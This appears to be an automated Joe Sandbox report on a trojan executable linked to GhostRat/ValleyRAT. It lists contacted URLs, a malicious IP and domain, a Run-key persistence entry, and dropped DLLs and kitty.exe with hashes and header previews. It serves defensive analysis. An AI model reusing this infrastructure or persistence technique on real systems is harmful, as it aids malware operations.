https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation	explorer.exe, 0000000C.00000000.1922009971.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3140182405.0000000007124000.00000004.00000001.00020000.00000000.sdmp	false		high
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp	explorer.exe, 0000000C.00000000.1927425047.000000000BE5D000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the	explorer.exe, 0000000C.00000000.1922009971.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3140182405.0000000007124000.00000004.00000001.00020000.00000000.sdmp	false		high
https://api.msn.com/	explorer.exe, 0000000C.00000002.3142832306.00000000092FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1923761492.00000000092FD000.00000004.00000001.00020000.00000000.sdmp	false		high
https://assets.activity.windows.com	Microsoft_Xtools.exe, 00000013.00000003.2304631549.00000187C7E34000.00000004.00000020.00020000.00000000.sdmp	false		high
https://http:///WopiFrame.aspx?	Microsoft_Xtools.exe, 00000009.00000003.1777690969.000002A39D4D3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ppe.activity.windows.com	Microsoft_Xtools.exe, 00000013.00000003.2304631549.00000187C7E34000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://activity.windows.com	Microsoft_Xtools.exe, 00000013.00000003.2304631549.00000187C7E34000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-	explorer.exe, 0000000C.00000000.1922009971.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3140182405.0000000007124000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.intel.com/repository/certificates/Intel%20External%20Basic%20Issuing%20CA%203B(1).crt0u	#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000000.1281835761.0000000000012000.00000002.00000001.01000000.00000004.sdmp	false		high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark	explorer.exe, 0000000C.00000002.3140182405.0000000007124000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com:443/en-us/feed	explorer.exe, 0000000C.00000000.1922009971.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3140182405.0000000007124000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-	explorer.exe, 0000000C.00000000.1922009971.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3140182405.0000000007124000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-ei	explorer.exe, 0000000C.00000000.1922009971.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3140182405.0000000007124000.00000004.00000001.00020000.00000000.sdmp	false		high
https://assets.activity.windows.com/v1/assets/$batch	Microsoft_Xtools.exe, 00000013.00000003.2304631549.00000187C7E34000.00000004.00000020.00020000.00000000.sdmp	false		high
https://%s.dnet.xboxlive.com	Microsoft_Xtools.exe, 00000013.00000003.2304631549.00000187C7E34000.00000004.00000020.00020000.00000000.sdmp	false		high
https://android.notify.windows.com/iOS%2	explorer.exe, 0000000C.00000003.3075659085.000000000BF37000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3147824505.000000000BF44000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
206.238.115.224	telegram--www.com	United States		174	COGENT-174US	true
3.5.237.40	s3-r-w.ap-east-1.amazonaws.com	United States		16509	AMAZON-02US	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1637075
Start date and time:	2025-03-13 10:49:21 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 46s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	21
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe renamed because original name is a hash value
Original Sample Name:	.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@13/21@2/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 73 Number of non-executed functions: 123
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.60.203.209, 20.12.23.50
Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
10:51:32	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run bfly C:\Users\user\4AAA4BEA-4B49-4018-AEDB-86BCC9AEB23A\kitty.exe
10:51:40	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run bfly C:\Users\user\4AAA4BEA-4B49-4018-AEDB-86BCC9AEB23A\kitty.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
206.238.115.224	2JG40PZnR7.exe	Get hash	malicious	GhostRat, ValleyRAT	Browse
3.5.237.40	GameBoxMini.exe	Get hash	malicious	Unknown	Browse
3.5.237.40	drivers.exe	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s3-r-w.ap-east-1.amazonaws.com	#U70b9#U51fb#U6b64#U5904-#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U53051.exe	Get hash	malicious	Unknown	Browse	52.95.160.78
	X227lrtOTJ.exe	Get hash	malicious	GhostRat, ValleyRAT	Browse	3.5.239.146
	6ESB4NGjGB.exe	Get hash	malicious	GhostRat, ValleyRAT	Browse	52.95.162.78
	image_2025-02-25_14-09-05-.exe	Get hash	malicious	GhostRat	Browse	3.5.238.183
	https://shekuitao123.vip/	Get hash	malicious	Bet365 Phisher	Browse	3.5.239.146
	https://3658509.cc/	Get hash	malicious	Unknown	Browse	52.95.161.78
	https://3658502.cc/	Get hash	malicious	Unknown	Browse	3.5.236.130
	https://3658505.cc/	Get hash	malicious	Unknown	Browse	3.5.238.183
	http://3658503.cc/	Get hash	malicious	Unknown	Browse	3.5.238.29
telegram--www.com	2JG40PZnR7.exe	Get hash	malicious	GhostRat, ValleyRAT	Browse	206.238.115.224

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-02US	https://test.novanotes.de/	Get hash	malicious	Unknown	Browse	99.80.185.42
	https://allegrolokalnie.pl-745667434.icu/dostawa/pilarka-stihl-ms-362-cm---jak-nowa-970323	Get hash	malicious	HTMLPhisher	Browse	54.76.226.10
	http://unbouncepages.com/uc61/	Get hash	malicious	Unknown	Browse	13.35.58.103
	http://unbouncepages.com/facebook-support_uc61/	Get hash	malicious	Unknown	Browse	13.35.58.93
	#U70b9#U51fb#U6b64#U5904-#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U53051.exe	Get hash	malicious	Unknown	Browse	52.95.160.78
	https://at-ts-awesome-site-f89b3f.webflow.io/	Get hash	malicious	Unknown	Browse	52.222.232.47
	na.elf	Get hash	malicious	Prometei	Browse	54.255.164.76
	http://discordcloness.netlify.app/	Get hash	malicious	Unknown	Browse	3.75.10.80
	https://caa609c5-32d2-4d37-95fa-69e6c8910ccd-00-1e8a7njs6nnd9.worf.replit.dev/	Get hash	malicious	Unknown	Browse	76.76.21.142
COGENT-174US	http://szrjxkj.com/dongtai/8622.html	Get hash	malicious	Unknown	Browse	38.174.150.133
	http://888881e.com/	Get hash	malicious	Unknown	Browse	149.104.73.29
	http://8669595.com/	Get hash	malicious	Bet365 Phisher	Browse	149.104.73.32
	PURCHASE ORDER N0259305-06SN.exe	Get hash	malicious	FormBook	Browse	149.104.35.122
	miori.x86.elf	Get hash	malicious	Unknown	Browse	38.119.147.17
	http://pastorizaplastics.com	Get hash	malicious	Unknown	Browse	154.39.177.133
	DHL_AWB#6078538091.exe	Get hash	malicious	FormBook	Browse	38.47.158.2
	9ua5N7dcBZ.exe	Get hash	malicious	Amadey, RHADAMANTHYS	Browse	45.93.20.224
	Transferencia 6997900002017937.exe	Get hash	malicious	FormBook	Browse	149.104.184.87
	resgod.arm7.elf	Get hash	malicious	Mirai	Browse	216.227.170.153

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	SecuriteInfo.com.Win32.DropperX-gen.23511.10885.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	3.5.237.40
	#U70b9#U51fb#U6b64#U5904-#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U53051.exe	Get hash	malicious	Unknown	Browse	3.5.237.40
	uy2g7z.bat	Get hash	malicious	Unknown	Browse	3.5.237.40
	PO-2513203-PDF.js	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	3.5.237.40
	brave.ps1	Get hash	malicious	Unknown	Browse	3.5.237.40
	justificante de transferencia09454545.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	3.5.237.40
	Dhl.exe	Get hash	malicious	DarkTortilla	Browse	3.5.237.40
	SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	3.5.237.40
	Doc13032025.vbs	Get hash	malicious	Unknown	Browse	3.5.237.40

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\4AAA4BEA-4B49-4018-AEDB-86BCC9AEB23A\MSVCP140.dll	X227lrtOTJ.exe	Get hash	malicious	GhostRat, ValleyRAT	Browse
	6ESB4NGjGB.exe	Get hash	malicious	GhostRat, ValleyRAT	Browse
	image_2025-02-25_14-09-05-.exe	Get hash	malicious	GhostRat	Browse
	T0pdaslk-guangwang-winelkxcac-64.msi	Get hash	malicious	GhostRat	Browse
	ExtrimHack CS2.exe	Get hash	malicious	Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer	Browse
	https://www.danielgm.net/cc/release/CloudCompare_v2.14.alpha_setup_x64.exe	Get hash	malicious	Unknown	Browse
	https://www.danielgm.net/cc/release/CloudCompare_v2.14.alpha_setup_x64.exe	Get hash	malicious	Unknown	Browse
	VJQyKuHEUe.exe	Get hash	malicious	Unknown	Browse
	sxVHUOSqVC.exe	Get hash	malicious	Unknown	Browse
	R0SkdJNujW.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_kitty.exe_d1ad3560a01f817f9eac77e9b1d483a5b4d6f089_50dbb93c_6832931e-cb72-413b-a58e-7af635475308\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7685532746072836
Encrypted:	false
SSDEEP:	192:YIOgwz50HIW4MxlajeJzuiFQZ24lO8Q9:YIOgwzaHIW4MxlajIzuiFQY4lO8Q9
MD5:	7A517772BDF0547C4F21B3808A9B5F8B
SHA1:	B4B0F756B22CED6DD94AB25EE7AB687DAF84D5AF
SHA-256:	268C0707ACBDD18345566635AE58D1344D624C4D81FC55C33A40E2BF7CE8BF0A
SHA-512:	2C5313C9A8577A8B92F8AFE951F2E46C8972EF5909A6A9FBE79B54368D2281ACADE8A97D1C7130836A91D65CB89EA0EB715C6F2472A2ADDEE5EC0C2FEEE341EC
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.6.3.3.3.1.0.1.2.1.2.1.3.4.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.8.3.2.9.3.1.e.-.c.b.7.2.-.4.1.3.b.-.a.5.8.e.-.7.a.f.6.3.5.4.7.5.3.0.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.0.e.0.b.c.7.c.-.6.1.0.5.-.4.0.5.3.-.9.3.d.d.-.3.3.e.4.6.6.1.0.1.b.2.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.k.i.t.t.y...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.O.v.e.r.w.o.l.f...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.d.0.-.0.0.0.1.-.0.0.1.9.-.6.0.2.d.-.2.2.8.5.f.d.9.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.3.0.3.e.e.7.1.3.4.f.2.6.c.7.8.1.5.5.9.d.9.1.8.9.e.a.4.5.6.a.c.2.0.0.0.0.0.0.0.0.!.0.0.0.0.2.9.2.a.f.7.1.b.7.2.9.5.e.1.9.0.d.d.0.a.5.6.6.9.3.2.4.a.9.d.5.1.c.c.b.2.9.6.7.d.!.k.i.t.t.y...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.5././.0.2././.1.7.:.1.5.:.1.4.:.1.3.!.1.c.5.d.2.!.k.i.t.t.y...e.x.e.....B.o.o.t.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8E3.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Thu Mar 13 09:51:41 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	56972
Entropy (8bit):	1.617876544343871
Encrypted:	false
SSDEEP:	192:GJNwtaMOWM5Velv+64z/IfskggTMCuDUC:yKax5Velv+6+/Ifs/gT/uD
MD5:	D3C97EBD4EFCEA49A79992D3CD8562A7
SHA1:	1DE76E8C1DDEF1583C117925A161A2FD1C6A618B
SHA-256:	8F6CC683223CEB2089D81372C45C5759B390F395C5F630C9713D6DC87C916C1C
SHA-512:	170D3EF8E886F2244B903B1A60D38992A3DD953C7EFF9ECB96A046E9054BF7E939DC6981CAAFB4B873F2F0E193DB43760A59FD6B577C51A830BB8958BEC441AA
Malicious:	false
Preview:	MDMP..a..... ..........g........................L...........4....)..........T.......8...........T.......................................................................................................................eJ......l.......Lw......................T..............g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER951.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8554
Entropy (8bit):	3.702913615321014
Encrypted:	false
SSDEEP:	192:R6l7wVeJdUbx6YZ+i3+igmfz+cRzrpBt89bWO1f4TSm:R6lXJebx6YAijgmfz+cRKWUf4H
MD5:	D266CFE9F7EE81A7A9BA956A7C20B209
SHA1:	4AD49CEADB44850C469ED4C5BCA4EC2D8C848E71
SHA-256:	61921B8672C3C5DDFB15C380AFBD38FAC3311B7204BE996A8FADEDF9F66B0D2A
SHA-512:	2D3027008C8B777134A8EA89A7627B58DE6115820FDAA5451B50F8A2BDBF85E0CE5B18DB9E844249D8B8AD727779B0AA1EFEBB1BAFBE316AE0BF818344039F2C
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.8.8.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER981.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4723
Entropy (8bit):	4.484447096671396
Encrypted:	false
SSDEEP:	48:cvIwWl8zsu/Jg771I9aFWpW8VYDYm8M4JcZHMCFxyq855tNaJP4ud:uIjf0I7B07VvJElw6P4ud
MD5:	DD808AA8160033F6512B28256BFBD177
SHA1:	415A2EE63D960AB008F1BB52DA8D43D5D1A666FF
SHA-256:	EDA90865F3E2AE78CC491EB18B30C9918AE6CF63106F07197098D5237AF63580
SHA-512:	13742F9721B5CBF225D296050203ED69FE563A8E70A2AA071CBFB558B577B4B03B3DE83131789935A54428D41F4AB4115BE1CF6A29B2CA8EF3EEF42EFE6D25BA
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="758934" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\kernelquick.sys

Download File

Process:	C:\Windows\explorer.exe
File Type:	data
Category:	modified
Size (bytes):	30
Entropy (8bit):	2.6616157143988106
Encrypted:	false
SSDEEP:	3:tblM6lEjln:tbhEZn
MD5:	AE50B29A0B8DCC411F24F1863B0EAFDE
SHA1:	D415A55627B1ADED8E4B2CBBA402F816B0461155
SHA-256:	6B4BBBCE480FBC50D39A8EC4B72CDB7D781B151921E063DD899FD9B736ADCF68
SHA-512:	D9A9BA42D99BE32D26667060BE1D523DCD20EAFA187A67F7919002CC6DA349FD058053C9C6F721D6FDB730EA02FBAA3013E51C0C653368BD6B3F57A4C0FCABA8
Malicious:	true
Preview:	C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.

C:\Users\user\4AAA4BEA-4B49-4018-AEDB-86BCC9AEB23A\MSVCP140.dll

Download File

Process:	C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	627992
Entropy (8bit):	6.360523442335369
Encrypted:	false
SSDEEP:	12288:dO93oUW7jh6DN0RUhsduQjqDZ6X/t5mTOKGmJ7DseBiltBMQEKZm+jWodEEVoFt:s3oUW7jh6DN0RUhsduQjqDZ6X/t5mTOo
MD5:	C1B066F9E3E2F3A6785161A8C7E0346A
SHA1:	8B3B943E79C40BC81FDAC1E038A276D034BBE812
SHA-256:	99E3E25CDA404283FBD96B25B7683A8D213E7954674ADEFA2279123A8D0701FD
SHA-512:	36F9E6C86AFBD80375295238B67E4F472EB86FCB84A590D8DBA928D4E7A502D4F903971827FDC331353E5B3D06616664450759432FDC8D304A56E7DACB84B728
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: X227lrtOTJ.exe, Detection: malicious, Browse Filename: 6ESB4NGjGB.exe, Detection: malicious, Browse Filename: image_2025-02-25_14-09-05-.exe, Detection: malicious, Browse Filename: T0pdaslk-guangwang-winelkxcac-64.msi, Detection: malicious, Browse Filename: ExtrimHack CS2.exe, Detection: malicious, Browse Filename: , Detection: malicious, Browse Filename: , Detection: malicious, Browse Filename: VJQyKuHEUe.exe, Detection: malicious, Browse Filename: sxVHUOSqVC.exe, Detection: malicious, Browse Filename: R0SkdJNujW.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......`..r$..!$..!$..!.O.!&..!-.\|!2..!v.. '..!$..!...!v.. '..!v.. o..!v.. j..!v.. %..!v..!%..!v.. %..!Rich$..!................PE..d.....0].........." .........`...... ...............................................T.....`A............................................h....................0..t@...T...A..............8............................................ ..........@....................text...<........................... ..`.rdata..<.... ......................@..@.data....;..........................@....pdata..t@...0...B..................@..@.didat..h............B..............@....rsrc................D..............@..@.reloc...............H..............@..B................................................................................................................................................................................................................

C:\Users\user\4AAA4BEA-4B49-4018-AEDB-86BCC9AEB23A\OWUtils.dll

Download File

Process:	C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	239235840
Entropy (8bit):	0.010248224367247672
Encrypted:	false
SSDEEP:
MD5:	60D3106C0ED639754603A78509C2C595
SHA1:	B2B4658554A6F00D56A8D3C6FAD6A4CEBFC3FDA3
SHA-256:	40ED2338F1B9C2B705848DF57DEE1B83847FCD6385C2B19928F4102C0E4FADD6
SHA-512:	7E737BFE343C6B0CECF46E02D4DB6AF91587C154B9F90BEE20C79292578D4E6FE3F9028888DAA939FF05FD1CE8ECC808BACA6B9637113FDB35714E27C287FAE8
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........T.P.:.P.:.P.:...9.U.:...?..:...>.Z.:.A+9.Y.:.A+>.^.:.A+?.v.:...;.U.:.P.;.0.:..+?.R.:..+:.Q.:..+.Q.:..+8.Q.:.RichP.:.........................PE..d...x~.g.........." .... ...8A......2........................................B...........`.............................................LW..,!..<....pB......PB......JB..)....B.\|...0...p..............................@............0...............................text...0........ .................. ..`.rdata.......0.......$..............@..@.data...H.@..0....@.................@....pdata.......PB......B.............@..@.rsrc........pB......@B.............@..@.reloc..\|.....B......BB.............@..B................................................................................................................................................................................................................................

C:\Users\user\4AAA4BEA-4B49-4018-AEDB-86BCC9AEB23A\VCRUNTIME140.dll

Download File

Process:	C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	119376
Entropy (8bit):	6.605105564769165
Encrypted:	false
SSDEEP:	1536:BqvQFDdwFBHKaPX8YKpWgeQqbekRG7MP4ddbHecbWcmpCGtodMzDZ92zfa:BqvQFDUXqWn7CkRG7jecbWb9toaera
MD5:	E9B690FBE5C4B96871214379659DD928
SHA1:	C199A4BEAC341ABC218257080B741ADA0FADECAF
SHA-256:	A06C9EA4F815DAC75D2C99684D433FBFC782010FAE887837A03F085A29A217E8
SHA-512:	00CF9B22AF6EBBC20D1B9C22FC4261394B7D98CCAD4823ABC5CA6FDAC537B43A00DB5B3829C304A85738BE5107927C0761C8276D6CB7F80E90F0A2C991DBCD8C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.../c../c../c._]b./c..W.../c../b./c../c../c...`./c...g./c...f./c...c./c....../c...a./c.Rich./c.........................PE..d.... ............" ...&. ...d.......................................................:....`A.........................................e..4...4m..........................PP...........N..p............................L..@............0...............................text...V........................... ..`fothk........ ...................... ..`.rdata..\C...0...D...$..............@..@.data...p............h..............@....pdata...............l..............@..@_RDATA...............x..............@..@.rsrc................z..............@..@.reloc...............~..............@..B................................................................................................................................................................

C:\Users\user\4AAA4BEA-4B49-4018-AEDB-86BCC9AEB23A\blackdll.dll

Download File

Process:	C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	217344
Entropy (8bit):	6.257847181941069
Encrypted:	false
SSDEEP:	3072:xclI1ooxdegSQFGUDbDqyV6pQt8TZDz7eL2SuGUPXeBOms4uZgbuqN5V:Z1oSegSsfbDqyNWZtouqp
MD5:	D380C81EB4F8FB7E5F4ADFFA15714561
SHA1:	C752F13BAC1DE82D83222552A36B38E61219BE04
SHA-256:	850C3164163089D5B83C8C2FBE1AFB3B954ED31333F01D9D5EDE3002AD96C7F2
SHA-512:	09A61A46E5BBB6307E8A22AE415F2D5D586D9A98FFAD93BFA62B7B1BA950C36EC52134E3446906C92BB09B60EB04990E05AA2E5D2310C30A8455E330AC33678E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........J...+..+..+..S..+..S..+..S..+.....+.....+.....+..S..+..+..+.(...+.(.%..+.(...+.Rich.+.........PE..d...v~.g.........." ........D.......c....................................................`.................................................$...<....`.......0..L ...(...)...p.........p...............................@............................................text...(........................... ..`.rdata..............................@..@.data..............................@....pdata..L ...0..."..................@..@.rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................

C:\Users\user\4AAA4BEA-4B49-4018-AEDB-86BCC9AEB23A\kitty.exe

Download File

Process:	C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe
File Type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	54528
Entropy (8bit):	5.957461148620665
Encrypted:	false
SSDEEP:	768:oU06LmVI24P+KgCVK3aba4WwSQ7cg+xfYcHewUAUYiPnnZ2EPFV:G6d28pXKqQwwUR7PnZPV
MD5:	1112642D4A051570A4CC0363136A16FD
SHA1:	292AF71B7295E190DD0A5669324A9D51CCB2967D
SHA-256:	FD4024B3FA8020E40604687FC2094BD0B5ABB2732A84DED839558232EA6AC013
SHA-512:	BB93EA0942BE0D79833F05E612B3F9E6CF44F9B1DDA1B3E3F983551B6059FB9A14825FE82F8BEEF8ED6D6DEB3635B1867B342A16649C0427D8C18528EFE6343D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...ER.g.........."......b...D........... .....@..... .......................@............@...@......@............... ..................(.... ..o........>...............)...........4............................................... ............... ..H............text....`... ...b.................. ..`.sdata..m............f..............@....rsrc....>.......@...h..............@..@.reloc..............................@..B.addImp...... ..................................................................................................................................................................................................................................................................................................................................................................................................................................................

